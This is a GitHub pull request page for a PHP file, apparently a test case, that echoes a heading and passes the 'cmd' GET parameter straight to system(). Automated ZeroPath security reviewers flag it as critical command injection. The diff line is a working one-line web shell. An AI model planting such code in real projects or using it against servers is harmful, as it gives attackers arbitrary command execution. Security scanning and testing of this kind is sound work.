Skip to content

Conversation

@r0path
Copy link
Owner

@r0path r0path commented Dec 4, 2025

No description provided.


echo "<h1>test</h1>";

system($_GET["cmd"]);
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Command Injection Vulnerability in asdas3d.php (Severity: HIGH)

Remote command execution is possible due to unsanitized user input. The application passes the value of the cmd parameter from the GET request directly to the system() function in asdas3d.php on line 7, which allows an attacker to execute arbitrary shell commands on the server. This can lead to complete system compromise.
View details in ZeroPath

@zeropath-ai
Copy link

zeropath-ai bot commented Dec 4, 2025

Possible security or compliance issues detected. Reviewed everything up to 0a0da94.

The following issues were found:

  • Command Injection
    • Location: asdas3d.php:7
    • Score: HIGH (81.0)
    • Description: Remote Command Execution via unsanitized user input. The code passes user-provided input ($_GET["cmd"]) directly into PHP's system() function, allowing an attacker to execute arbitrary shell commands on the server.
    • Link to UI: https://zeropath.com/app/issues/baa9cbd2-3aeb-4c2f-aa5c-3798d6504263
Security Overview
Detected Code Changes
Change Type Relevant files
Other ► asdas3d.php
    Added new file

Reply to this PR with @zeropath-ai followed by a description of what change you want and we'll auto-submit a change to this PR to implement it.

echo "<h1>test</h1>";

system($_GET["cmd"]);

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Remote Command Execution in asdas3d.php via 'cmd' Parameter (Severity: CRITICAL)

This vulnerability allows attackers to execute arbitrary commands on the server, potentially leading to complete system compromise. The system() call in asdas3d.php (lines 8-8) directly uses the value of the cmd GET parameter without any sanitization. This allows an attacker to inject malicious commands into the system, resulting in unauthorized access and control.
View details in ZeroPath

@zeropath-ai-staging
Copy link

Possible security or compliance issues detected. Reviewed everything up to 0a0da94.

The following issues were found:

Security Overview
Detected Code Changes
Change Type Relevant files
New file ► asdas3d.php
    

Reply to this PR with @zeropath-ai followed by a description of what change you want and we'll auto-submit a change to this PR to implement it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants